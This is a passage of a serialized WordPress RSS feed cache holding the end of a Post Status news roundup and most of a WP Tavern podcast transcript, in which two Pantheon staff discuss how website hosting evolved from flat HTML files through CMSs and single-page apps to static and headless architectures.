id=\"h-wp-cli\">WP-CLI</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/cli/2023/04/05/wp-cli-v2-8-0-release-date/\">WP-CLI v2.8.0 release date</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-wptv\">WPTV</h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.tv/category/year/2022/\">Latest WordPress TV videos</a></li>\n</ul>\n</div>\n</div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-related-news\">Related News:</h2>\n\n\n\n<ul>\n<li><a href=\"https://www.php.net/archive/2023.php#2023-02-14-2\">PHP 8.2.4 Released!</a></li>\n\n\n\n<li><a href=\"https://www.php.net/archive/2023.php#2023-03-16-1\">PHP 8.1.17 Released!</a></li>\n\n\n\n<li><a href=\"https://262.ecma-international.org/13.0/\">TC39</a></li>\n\n\n\n<li><a href=\"https://github.com/composer/composer/releases/tag/2.5.5\">Composer 2.5.5</a></li>\n</ul>\n\n\n\n<p class=\"has-theme-palette-7-background-color has-background\">Thanks for reading our WP dot .org roundup! Each week we are highlighting the news and discussions coming from the good folks making WordPress possible. If you or your company create products or services that use WordPress, you need to be engaged with them and their work. Be sure to share this resource with your product and project managers. <br /><br /><strong>Are you interested in giving back and contributing your time and skills to WordPress.org?</strong> <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> <a href=\"https://wordpress.org/support/article/contributing-to-wordpress/\">Start Here ›</a><br /><br /><strong>Get our weekly WordPress community news digest</strong> — Post Status&#8217; <a href=\"https://poststatus.com/news/week-in-review/\">Week in Review</a> — covering the WP/Woo news plus significant writing and podcasts. It&#8217;s also available in <a href=\"https://poststatus.com/newsletter\">our newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f48c.png\" alt=\"💌\" class=\"wp-smiley\" /></p>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile has-background\"><a href=\"https://poststatus.com/\"><img src=\"https://poststatus.com/wp-content/uploads/2021/09/vertical-post-status-logo-250.png\" alt=\"Post Status\" class=\"wp-image-85823 size-full\" /></a><div class=\"wp-block-media-text__content\">\n<p class=\"has-text-align-left has-normal-font-size\" id=\"h-get-ready-for-remote-work\">You — and <a href=\"https://poststatus.com/#Agency\">your whole team</a> can <a href=\"https://poststatus.com/#choose-membership\">Join Post Status</a> too!</p>\n\n\n\n<p class=\"has-text-align-left has-small-font-size\"><strong>Build your network. Learn with others. Find your next job — or your next hire.</strong> Read the <strong>Post Status</strong> <a href=\"https://poststatus.com/newsletter/\">newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/2709.png\" alt=\"✉\" class=\"wp-smiley\" /> Listen to <a href=\"https://poststatus.com/podcasts/\">podcasts</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f399.png\" alt=\"🎙\" class=\"wp-smiley\" /> Follow <a href=\"https://twitter.com/post_status/\">@Post_Status</a> <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> and <a href=\"https://www.linkedin.com/company/post-status-llc/\">LinkedIn</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4bc.png\" alt=\"💼\" class=\"wp-smiley\" /></p>\n</div></div>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Apr 2023 19:30:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Courtney Robertson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: #70 – Steve Persch and Brian Perry on How Hosting Is Changing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=143278\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wptavern.com/podcast/70-steve-persch-and-brian-perry-on-how-hosting-is-changing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:53090:\"Transcription<div>\n<p>[00:00:00] Nathan Wrigley: Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case, the past and future of website hosting.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice. Or by going to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the show, I&#8217;m keen to hear from you and hopefully get you all your idea on the podcast as soon as possible. Head over to WPTavern.com forward slash contact forward slash jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today, we have Steve Persch and Brian Perry. They&#8217;re both employed at Pantheon, an enterprise website operations platform. And they&#8217;re here to talk about the evolution of website hosting.</p>\n\n\n\n<p>Back when the internet started, hosting was a fairly straightforward enterprise. You created HTML files and uploaded them to a server. That was it. An HTML file was a page.</p>\n\n\n\n<p>Server-side technology such as PHP came along, and the picture became a little more complex. Web pages needed to be constructed on the fly. Databases were thrown into the mix, and the complexity increased. Add in the different languages that you could write your code in, and the server configurations. The CMS that you choose also plays into this mix. Now we&#8217;ve got CDNs, headless, React, Gatsby, Node.js and much more. Is it even possible for the non-technical to have any understanding of where their website is?</p>\n\n\n\n<p>Steve and Brian talk about how they got into the hosting space, and what&#8217;s changed over the years. We address what Pantheon is doing with WordPress and Drupal.</p>\n\n\n\n<p>We discuss how headless can be difficult for content teams, given that there&#8217;s a disconnect with hitting the publish button and that content going live on the site.</p>\n\n\n\n<p>What&#8217;s certain is that there&#8217;s no end in sight in terms of the rate of innovation in the website hosting space. What&#8217;s popular today might not be several years from now. And so it&#8217;s a timely discussion of what Steve and Brian see as the best bets for the future.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading over to WPTavern.com forward slash podcast, where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so, without further delay I bring you Steve Persch and Brian Perry.</p>\n\n\n\n<p>I am joined on the podcast today by Steve Persch and Brian Perry. Hello.</p>\n\n\n\n<p>[00:03:37] Steve Persch: Hello, Steve Persh here. Happy to be here.</p>\n\n\n\n<p>[00:03:39] Brian Perry: Yeah, Brian Perry also really excited to chat.</p>\n\n\n\n<p>[00:03:42] Nathan Wrigley: Well, thank you for joining me on the podcast today. We&#8217;re going to talk about something, and I seem to have said this sentence much more often recently, about something that that really is a mystery to me. You are going to school me in all sorts of ways about something that I&#8217;m really not that familiar with, and that is all about how files get served up. Where are our website files being kept? Where are the computers? Where&#8217;s the infrastructure, and how much more complicated it has become over the last 10 or 15 years.</p>\n\n\n\n<p>Before we begin that, I think we&#8217;ll take you in order. I&#8217;ll go Steve first, if that&#8217;s all right? I&#8217;m wondering if both of you can give us a little bit of orientation about who you are, who you work for. Your history with technology and possibly WordPress in particular. So yeah, we&#8217;ll launch that with Steve.</p>\n\n\n\n<p>[00:04:28] Steve Persch: Sure, so Steve Persch here in Minneapolis, Minnesota. I&#8217;m the director of technical marketing at Pantheon. We&#8217;re a website operations platform for Drupal, WordPress and now front end frameworks, which is, much of what, thinking about that question of what computer makes the website.</p>\n\n\n\n<p>I&#8217;ve been in the web space for a while now. I first started making websites, first semi-professionally, and then professionally in the early days of WordPress. I built some of my first professional websites in WordPress 2, back in 2006. Then for some of the sites that I wanted to make, that took me into the Drupal world. And now in Pantheon, we play in both of those worlds, in the lamp stack, and as Pantheon is aiming itself at running extraordinary websites, as we like to say, the best possible websites. We see that that requires us to step more fully into the JavaScript centric front end framework ecosystem.</p>\n\n\n\n<p>[00:05:23] Nathan Wrigley: Well thank you Steve. That was great. We&#8217;ll hand it over to Brian to do a similar job.</p>\n\n\n\n<p>[00:05:28] Brian Perry: I&#8217;m Brian Perry. I&#8217;m a staff software engineer at Pantheon. What I&#8217;m focusing on at Pantheon is leading a project we&#8217;re calling Decoupled Kit, which is a set of open source utilities and projects that aim to make this decoupled architecture or running headless WordPress and Drupal sites easier.</p>\n\n\n\n<p>What brought me to that is, prior to Pantheon, a lot of my background was in the agency space. Specifically focusing on front end and front end develop. More and more I found myself interested in what was going on in the JavaScript ecosystem, and working on projects where using a CMS like WordPress or Drupal to feed data into the front end. But also found that there were a lot of solutions that were being invented over and over to solve those problems. So being able to focus on trying to make that easier for folks has been really exciting.</p>\n\n\n\n<p>[00:06:24] Nathan Wrigley: Thank you very much indeed. So you&#8217;re both coming from Pantheon and you mentioned there that you have a very keen focus on, well you mentioned two CMSs, which is curious actually. Obviously this is a WordPress podcast, but we&#8217;re not here to destroy the opposition if you like. But Drupal and WordPress, I think I&#8217;m right in saying that you don&#8217;t find too many hosting companies that lay claim to both of those. Is that a relic of the past of Pantheon, how it all began back in the day?</p>\n\n\n\n<p>[00:06:51] Steve Persch: It&#8217;s an intentional choice. We think that supporting both of those systems gives us more flexibility. It ends up fitting us better to our core audience. Pantheon started with digital agencies. Our four founders came from running web development agencies, that&#8217;s the background.</p>\n\n\n\n<p>And for a lot of the agencies and in the ecosystems we came from, we knew that it was normal for those sorts of agencies to have a preference between Drupal, WordPress or, you know, Ruby and Rails or any other of system. But often, the given client you&#8217;re working for might have both, for any number of historical reasons.</p>\n\n\n\n<p>So yes, the initiation of that was, uh, somewhat happenstance. Our customers figuring out like, this platform was first built for Drupal, I bet we could make it run WordPress. And then Pantheon as a company realizing like, yes, we should support WordPress. That&#8217;s something that I think was a bit inevitable.</p>\n\n\n\n<p>It&#8217;s good for us technologically and business wise to support more than one. And at the same time it&#8217;s good for us to not open it up as wide as, well, anything PHP. Some of our competitors take the other extreme of, hey, if you can make it run then you&#8217;re good. We think of ourselves as, we prefer the term, a website operations platform.</p>\n\n\n\n<p>And hosting is a feature of that. But don&#8217;t want to have a relationship with our customers that&#8217;s as simple as like, well, yeah, if you can make it run, that&#8217;s good. We&#8217;re only here to provide the server. We see ourselves as facilitating more growth of value of the websites, not just the question of can this run at all?</p>\n\n\n\n<p>[00:08:21] Brian Perry: Yeah, I think that, that same sort of concept also extends to the front end and JavaScript frameworks in that, there&#8217;s definitely a lot of excitement around Next.js. But we are looking to build a platform where other future frameworks can run on it. But also, yeah, we&#8217;re not necessarily trying to be like, run whatever crazy JavaScript project you want. We want to have some guardrails there.</p>\n\n\n\n<p>[00:08:44] Nathan Wrigley: I remember back in the day prior to stumbling across WordPress, which I did quite a long time ago now, I used to use Drupal exclusively actually, and I have a, have a memory of Pantheon cropping up, and at the time, really hadn&#8217;t heard of a hosting company that was binding itself to a CMS in that way.</p>\n\n\n\n<p>It was curious to me that Pantheon had laid claim to, okay, if you&#8217;re using a CMS, we&#8217;re somebody that you should look at. Prior to that, it was always, we&#8217;re just a hosting company. You know, we&#8217;ll host anything.</p>\n\n\n\n<p>[00:09:16] Steve Persch: I often go back to the first blog post that was done by, one of our co-founders, our four co-founders, when Pantheon started. I think the title of the blog post was Putting the Humans at the Top of the Stack. And it laid out, or at the time, but a decade plus ago, two common ways of running websites.</p>\n\n\n\n<p>One was just that hosting mode of a host providing some baseline technological capabilities, but the team buying the hosting is responsible for assembling the parts and making it all work. And yes, that&#8217;s an appropriate choice for some teams, but it&#8217;s not a great recipe for success for what we see as the broad plurality of professional web teams.</p>\n\n\n\n<p>The other extreme at the time, and it&#8217;s still present there, is the Squarespace, Wix, very templatized, cookie cutter way of building a site. Which again, is totally appropriate for certain people who need websites. But Pantheon, a decade ago and still now, wants to find a middle path that empowers the majority, or a plurality of professional web teams to make the best possible websites.</p>\n\n\n\n<p>And we see that, fulfilling that mission does require us to build CMS specific capabilities, and now front end framework specific capabilities, while not putting ourselves as narrow as only WordPress, or only Next.js.</p>\n\n\n\n<p>[00:10:35] Nathan Wrigley: Okay. That&#8217;s really interesting. Thank you for that. The subject at hand is really about how hosting has changed over the last decade, two decades, what have you. And it might be of interest to the listeners to the podcast if they pause for a moment and go and watch one of the videos. It was created by Steve, I believe, created the video.</p>\n\n\n\n<p>It&#8217;s called Decoupled Architectures, What Computer Assembles the website, and it&#8217;s a great watch. It&#8217;s. 10 minutes long, and it&#8217;ll give you a real insight into the things that we&#8217;re going to talk about. What Steve brings to bear is lots of papers and drawing, which we can&#8217;t do on this podcast, but they really do help solidify the problem. He&#8217;s got lots of nice diagrams of how things are working.</p>\n\n\n\n<p>But just to rewind the clock, let&#8217;s go back 20 years or so ago. It seems like an age almost at the birth of the internet almost. But if you had a website, whatever CMS it was. You would have to host it somewhere, and you would probably select a host and upload the files.</p>\n\n\n\n<p>They were probably at that point, just static HTML. I imagine CSS probably hadn&#8217;t even emerged at that point. And you just uploaded them. And you had a great idea of where that computer was. You had a slice, a share of that computer. It was yours. You could point to where it was on the map and so on and so forth.</p>\n\n\n\n<p>And that&#8217;s not how it&#8217;s done now. Or at least that&#8217;s not how everybody&#8217;s doing it. So I want us to run through a history of how that&#8217;s changed over time. Going right back from the beginnings when the internet began and you could build your own websites. Right up to how it&#8217;s done now. We can really be ponderous about this, we&#8217;ve got a whole episode ahead of us. So, whoever wants to begin that journey, you can flip flop and change, do tag team if you like, but that&#8217;s what I want to do. The history of how hosting has changed.</p>\n\n\n\n<p>[00:12:19] Steve Persch: Brian, if you don&#8217;t mind, I&#8217;ll start from flat HTML files, and enter us into the era of PHP. And then you can talk about CMSs. So one of my first experiences getting paid to maintain a website, a thing, I wasn&#8217;t even pondering as a career path. I was a theater major, and then I found myself working in the marketing department of a theater company. And they had a flat HTML website that did the job, was good enough for the early two thousands. A few hundred pages of flat HTML files, mostly it&#8217;s like if you want to buy tickets, call this phone number. Here&#8217;s the production that we&#8217;re producing, here&#8217;s the calendar.</p>\n\n\n\n<p>And one of the most annoying tasks, once I became the person getting paid to update the website was, add this menu link in the sidebar. And that sidebar appears on like a dozen pages. Okay, so I open up a dozen flat HTML files and then I notice, oh, this sub sidebar menu for the education department of the theater company. This menu isn&#8217;t even consistent on these 12 HTML files, because over however many years, copy paste errors happened. And that&#8217;s annoying, and creates a bad, confusing experience.</p>\n\n\n\n<p>But, I know enough to realize that I could put in some PHP tags, and save myself some time. That&#8217;s how I first started transitioning that question of, what computer assembles the website? How does this website really come together? The first answer of, it&#8217;s all flat HTML that I&#8217;ve got to hand code on my own machine to, what if I put a little bit more, just a little bit more intelligence in the server and told it to like PHP include education sub sidebar dot PHP.</p>\n\n\n\n<p>Then I don&#8217;t have to worry about copy pasting menu updates across 12 HTML files. That started to transition the question of what computer assembles the website, but the content management systems that were cropping up at the same time, WordPress, Drupal, others, provided a much more robust answer. But I can let Brian talk about that.</p>\n\n\n\n<p>[00:14:25] Nathan Wrigley: I&#8217;ll just interject at that point because the pain that you&#8217;ve just described was my pain. I remember exactly that. I mean, it wasn&#8217;t the 200 page website, but I remember the exact same thing. And then stumbling across the, oh, you can include something with PHP can you? That will take that whole burden, maybe the header or the footer or wherever it may be on the website.</p>\n\n\n\n<p>And I do remember finding that really quite startling, and thinking good grief. I&#8217;ve just saved myself literally hours of time, and it was fabulous. It was really, really an excellent moment. So, okay, so.</p>\n\n\n\n<p>[00:15:00] Brian Perry: It&#8217;s also a, it&#8217;s a gateway to the danger of creating your own CMS, I don&#8217;t know if anybody on this has done that?</p>\n\n\n\n<p>[00:15:07] Nathan Wrigley: Yes, that&#8217;s exactly what I did. We&#8217;ve laid the pathway then to, we&#8217;ve got PHP in there somehow now, and so now we&#8217;re moving towards CMSs. So I guess we&#8217;ll hand it to Brian to tell us what came next.</p>\n\n\n\n<p>[00:15:19] Brian Perry: Yeah, and Steve, feel free to jump in as the overall tour guide with any color commentary. But yeah so, many of us have rolled our own CMSs. But then projects like WordPress and Drupal come along and provide a consistent user experience to being able to manage your data. Have an associated front end.</p>\n\n\n\n<p>It&#8217;s the great situation where there&#8217;s a community of folks making that project better, rather than the CMS we built on our own. That is a situation where you have your CMS, that handles that data. But it is essentially a single lamp stack. And your CMS is responsible for assembling your website. So you can edit things in the admin. But at the end of the day, WordPress, for example, is what puts everything together, using its templates and providing the end page that the user interacts with.</p>\n\n\n\n<p>[00:16:15] Steve Persch: Another way I think about this progression is through the lens of the three really broad groups of people who make a website like this possible. Especially in those early PHP days, to make something like this work there&#8217;s someone probably with an IT sort of job title who&#8217;s setting up the server. There&#8217;s someone with like a web developer type of job title who&#8217;s making the Drupal or WordPress part work, and they may be working with designers as well. And then there are people managing the content.</p>\n\n\n\n<p>So in addition to what computer assembles the website, a more specific framing is where is the work of these three broad groups of people coming together? It&#8217;s coming together over and over and over and over again, to make a functioning website. And in the lamp stack era, it&#8217;s that PHP server, you know, be it shared hosting or a server in the closet. That is where the work of those three groups has to fit together.</p>\n\n\n\n<p>And for the decade or so that the lamp stack was dominant, there became pretty solidified best practices on how those three groups need to work together in order to do their jobs most effectively.</p>\n\n\n\n<p>[00:17:26] Nathan Wrigley: I feel that&#8217;s a really nice segregation of the different things that were going on. But also it makes the two bits that you are not involved with suddenly quite mysterious. If you&#8217;re the content editor, suddenly the IT bit, the hosting if you like, you&#8217;re no longer involved in that in any way. And, so that over time becomes a little bit more murky and what have you.</p>\n\n\n\n<p>But the advent of the CMS suddenly opened up a whole range of possibilities for people who really don&#8217;t have any technical, they don&#8217;t desire to be technical. They want to be consumed with the content. They want to log into something, type away, upload images, what have you, and press publish, and for it to be done.</p>\n\n\n\n<p>So I think that&#8217;s a really useful definition. Prior to that, you had to be fairly technical, at least technically enough to create the HTML and what have you, to then upload it to the server. And now we&#8217;ve got a kind of career path coming out of it, haven&#8217;t we? We&#8217;ve got the IT people, we&#8217;ve got the editor people, and various other different pieces of the puzzle.</p>\n\n\n\n<p>It feels like maybe that is where quite a few people will still be with WordPress. That is to say they&#8217;ve got a WordPress website, they&#8217;re paying a monthly fee to a hosting company. That hosting company is literally holding the files of the CMS, in our case, WordPress. Holding them on a particular box somewhere. The DNS is pointed correctly. It all works. That set up is still doable, but I guess the journey doesn&#8217;t end there. I suppose we&#8217;ve got quite a long way to go in this journey.</p>\n\n\n\n<p>[00:18:59] Steve Persch: Yeah, the journey does not end there. Actually it might, because it comes back around. There are other steps along the way. So, I see the next big event in this history as the release of the iPhone. Which for a while I wondered like, am I drawn to that as the key moment? Because that&#8217;s when I was coming into professional web development, around 2007. In the decade plus remove, I can see, no, that really was a big deal when we had to figure out how to make websites squish, and fit on different size devices. Phones, tablets, Android devices of every single size and resolution.</p>\n\n\n\n<p>That was a huge change. And it came about at the same time these native application ecosystems sprung up, and really, really raised the bar for how good of an experience you could have on these devices. So not only is this just a new form factor to make work at all. The quality bar jumps up very, very high. In retrospect, I can see like, oh, that set off a bit of a panic in the web development community. And different people reacted in different ways and, you look at the 2010s and think, oh yeah, people ran in a bunch of different directions trying to handle or deal with the existential question of, how does the web stay relevant when literally billions of dollars are pushing technology towards native applications.</p>\n\n\n\n<p>[00:20:33] Nathan Wrigley: I feel there&#8217;s some other pieces I might add into that as well, and that is, the invention of the iPhone, which then spawned so many other similar devices, some slightly larger, some competing operating systems. But the thing there was suddenly the internet went from something which was probably peripheral in your life.</p>\n\n\n\n<p>You would interact with it, maybe with email or something at work. You&#8217;d have to turn on a computer and sit in a chair. And the internet would be on that screen and then you&#8217;d walk away from it and you&#8217;ve forgotten about the internet. Suddenly you&#8217;re at a point where the internet is with you 24 7, should you wish. It&#8217;s there all the time. So it marks a moment where not only is it technically possible to do it, but it increases the importance in everybody&#8217;s lives. So, almost everything now, what are we now about 15 years later or something?</p>\n\n\n\n<p>Almost everything can have a web presence. You know, you were talking about buying tickets earlier. Well, what&#8217;s the best way to do that now? It&#8217;s the internet. How do you consume your radio? It&#8217;s the internet. Where does your entertainment come from? It&#8217;s the internet. There&#8217;s almost nothing, which the internet hasn&#8217;t touched, and I feel that that was the inflection point when it went in your back pocket and suddenly every company on earth had a window into everybody&#8217;s lives.</p>\n\n\n\n<p>[00:21:50] Brian Perry: It&#8217;s a blessing and a curse.</p>\n\n\n\n<p>[00:21:52] Nathan Wrigley: But also a convergence of the technology, you know. So cellular data was suddenly getting rolled out. Prior to that it was just mobile phones was as, as much as you could do. You could do voice chat and so on. But then mobile data came along and it all coincided at the same time. So I, yeah, Steve, I think that&#8217;s a really insight thing. The iPhone being this moment.</p>\n\n\n\n<p>[00:22:09] Steve Persch: So the iPhone, when it comes out, it suddenly becomes the most powerful computer in the whole stack. If you&#8217;re thinking about what can we make a website or a native application? What can I do with this device? A lot of people consciously or unconsciously realized if we push more responsibility to this last computer in the chain. From the developer&#8217;s computers. There are still servers involved.</p>\n\n\n\n<p>There are increasing number of computers in the cloud that are involved in getting the website to that iPhone. But the iPhone in many respects, the most powerful computer in the whole stack, and that leads to an architecture of, oh, let&#8217;s make that end device, be it a laptop, a high powered iPhone or a low powered budget Android phone. Let&#8217;s put all the responsibility there. Brian, I bet you could talk in greater detail about the upsides and the downsides of the single page application architecture that came about when a lot of the web development ecosystems said, oh, let&#8217;s put all the responsibility in the client, in the end device.</p>\n\n\n\n<p>[00:23:16] Brian Perry: Yeah, there&#8217;s definitely like a huge trade off to that in that the end result that we&#8217;re doing there, especially thinking about modern JavaScript frameworks, were essentially pushing more responsibility, more code, more JavaScript to that end device. So there&#8217;s more places where things could potentially go wrong.</p>\n\n\n\n<p>There&#8217;s more cases where rather than having just a HTML document that is passed from a device to device, it actually has responsible, responsibility for rendering the page and executing all of that code. And it&#8217;s even a situation where things as simple as being able to click the back button in your browser to go to the previous HTML document, that&#8217;s things that need to be handled within that client device.</p>\n\n\n\n<p>So it really does increase the complexity there. And then also related to what we&#8217;ve been talking about and thinking about, the three audiences that we talked about before. One thing that jumped out to me is that as we&#8217;re finding all of these, you know, the internet everywhere, and all of these, different devices that can be used for these different purposes. I think some of also what brings us to the headless architectures that we&#8217;re going to get to down the line, is in some ways, I think driven by the content editor. In that they still want to have one place where they can go and manage content that is going to show up in all of these different places.</p>\n\n\n\n<p>Whether it&#8217;s a client side page, a traditional website, things managed by PHP, and I think that also does start to lead us in the direction of how can we manage this content in one place and make that data available to all kinds of different consumers.</p>\n\n\n\n<p>[00:25:01] Nathan Wrigley: So we have the, we have the iPhone, and prior to that we have just regular servers. I guess we&#8217;ve now got to take a bit of a leap and stray into an area where maybe many of us really don&#8217;t know what we&#8217;re talking about, and I&#8217;ve very much include myself in this. What are the evolution of things that have happened subsequently since the iPhone?</p>\n\n\n\n<p>And what was the purpose of all of that? Were there things which were tried and failed? And I suppose we are slowly getting towards the present day, but if there&#8217;s been some interesting evolutions during that time which need to be mentioned to give context, please do.</p>\n\n\n\n<p>[00:25:35] Steve Persch: Absolutely, I think one dynamic that played out in the 2010s was the splintering of all these different disciplines. I said in that lamp stack era, there are these three broad groups, of IT and content editors and developers. And I was even lumping in designers with the developers there.</p>\n\n\n\n<p>There might be some designers who take offense to that, but you know, it&#8217;s a blurry line. I lump them together because at a very, a very zoom out level that that&#8217;s the group that&#8217;s responsible for controlling how the website looks. And the handoffs that happened between designer and developer have changed over the years.</p>\n\n\n\n<p>But in the 2010s, there&#8217;s just an incredible splintering of the amount of detailed knowledge necessary to make websites look good across all these different devices was so large it was just unreasonable to think that you can hire one human being to know how to even implement a good design across all of these devices.</p>\n\n\n\n<p>Who also knows how to, like, configure Advanced Custom Fields and WordPress. That&#8217;s not a terribly reasonable expectation, to think you can find one person who is excellent at both of those things. Some of those people do exist in the world, but for many team leaders putting together teams, they&#8217;re realizing, we&#8217;re going to be better off if we say like, Steve, you&#8217;re going to be the backend expert, and Brian, you&#8217;re going to be the front end expert. And, even though Brian has a whole lot of that backend expertise, for many teams, they just decided to make a hard divide in the people.</p>\n\n\n\n<p>And then subsequently, or the order was sometimes flipped, a hard divide in the technology. So for, you know, a lot of websites built in this era, there is a very hard divide between the content management system is over here, be it WordPress or Drupal or a natively headless system like Contentful or Sanity. That&#8217;s going to be managed by one group, and then this group of front end specialists will handle the front end presentation.</p>\n\n\n\n<p>That&#8217;s a hard cut to make. A question I&#8217;ve been asking for the last decade or so is, if we&#8217;re going to cut off WordPress&#8217;s head or Drupal&#8217;s head, where is the neck? That is an answer that is constantly moving. The next era, after single page applications, is static site generation. As people saw the, you know, that downside of single page applications, then it&#8217;s, oh, well what if we, what if we get some of the benefits of that old way of doing it where it was just flat files? Can we have flat files again, Brian.</p>\n\n\n\n<p>[00:28:06] Nathan Wrigley: Full circle.</p>\n\n\n\n<p>[00:28:07] Brian Perry: Exactly. That introduces a whole new set of challenges and trade offs. You know, it certainly does, things being completely static does provide a build asset that is immutable, and it&#8217;s easy to roll back. It&#8217;s something that can be cached on a CDN. But also it really changes, kind of going back to again, the editing experience. It really drastically changes that experience where someone who was used to editing a page in WordPress and clicking publish and then being able to see the page.</p>\n\n\n\n<p>Now you have a workflow where you make a change in your CMS or whatever the source of the data is, and then a build has to run to be able to have the end website updated. And how do you preview what that looks like before the build runs? Do you need a separate environment? That trade off definitely brings a lot of additional complexity potentially to the content editing experience now.</p>\n\n\n\n<p>[00:29:07] Nathan Wrigley: Yeah, I think it&#8217;s potentially very frustrating as well because although the technological benefits and probably things like SEO and all of those things. There probably are great benefits there. If you&#8217;re the content editor, there&#8217;s probably only annoyance that when you click publish nothing happens.</p>\n\n\n\n<p>We&#8217;ve got to wait for some, like you say, some build process to carry on. You&#8217;re adding in a great deal of incredible technological innovation, which speed things up and pushes things to different parts of the world, and I&#8217;m sure it&#8217;s something we can get into. But also from the content editing point of view, we&#8217;ve had this evolution toward being able to edit everything right away, and click publish and seeing it, to then suddenly yanking that carpet out from underneath them, which is yeah, kind of frustrating I guess.</p>\n\n\n\n<p>[00:29:55] Steve Persch: I called this the cliff of complexity. If you search on YouTube for that phrase, you can probably find a presentation that I did at Gatsby Conf. So Gatsby, as a front end framework, really became popular as that static site generator pattern was on the ascendance, because there are so many technological benefits to be had, but when you add in a handful of possibly extra requirements. Requirements like, well, the content editors really like to be able to press publish and see it immediately. That shoots you up this cliff where making that work in an architecture that is fundamentally static, is really cutting against the grain.</p>\n\n\n\n<p>Like it can be made to work, but is massively complex. And we think for a lot of teams like that complexity is just now worth it. The fundamental mode that WordPress has done for 20 years of like, you press publish and then you see it immediately. That is something that should not be compromised on for most teams.</p>\n\n\n\n<p>[00:30:56] Nathan Wrigley: We&#8217;re used to a trajectory where technology just gets better in every respect. So, not only does it get quicker, but the, you know, the UI is easier to use and there&#8217;s a complete expectation that if I could publish it yesterday, and click publish and it was published right away and I could examine and look for errors that I&#8217;d made.</p>\n\n\n\n<p>Well, we&#8217;re a year on from that. Why have you taken that capability away from me? We&#8217;re going backwards? Well, we&#8217;re kind of going sideways. We&#8217;re not going back because we&#8217;re just changing things. I think that would be a bitter pill to swallow. Hard to understand if you&#8217;re not technical.</p>\n\n\n\n<p>[00:31:30] Steve Persch: Yeah, absolutely. And I think that&#8217;s, that backwards moving or that sideways moving does happen in other places. That&#8217;s not something I think that&#8217;s unique to web development. I remember the first time I got a car that relied heavily on a touchscreen. I was like, no, I want a knob to turn up the volume on the radio. This is so much worse. But somebody thought, no touchscreens, that&#8217;s the future. No. A lot of cars are now backswinging. There&#8217;s some parts that we do need physical buttons and dials for. That is better.</p>\n\n\n\n<p>[00:32:01] Brian Perry: I was going to say, it&#8217;s funny that you bring up the car example because, my car actually has both, which is somewhat infuriating. There is a touchscreen that could do everything. And then on the console, all the knobs and buttons, they can do the exact same things. I feel like the JavaScript frameworks in trying to address the shift aggressively in the direction of static sites has had a period of time where it was the equivalent of my car that had both.</p>\n\n\n\n<p>So things started shifting back over to server side rendering. But a lot of the frameworks had, and still have, concepts of both at one time. So there are ways that you can say, I want to either build things statically by default, and after some period of time they&#8217;re invalidated and re rendered on the server. Or say that it&#8217;s this subset of pages that are pre-rendered statically. Maybe it&#8217;s my homepage, and my 100 most popular pages.</p>\n\n\n\n<p>And then other things are handled server side. That also does increase the complexity now. You have to know what things are static, what things are not. It&#8217;s kind of two different approaches. But yeah, it does feel a lot like my car that has essentially two completely redundant ways to interface with it.</p>\n\n\n\n<p>[00:33:19] Nathan Wrigley: I&#8217;m waiting for somebody to invent the car which has levers in it. So that you&#8217;ve got 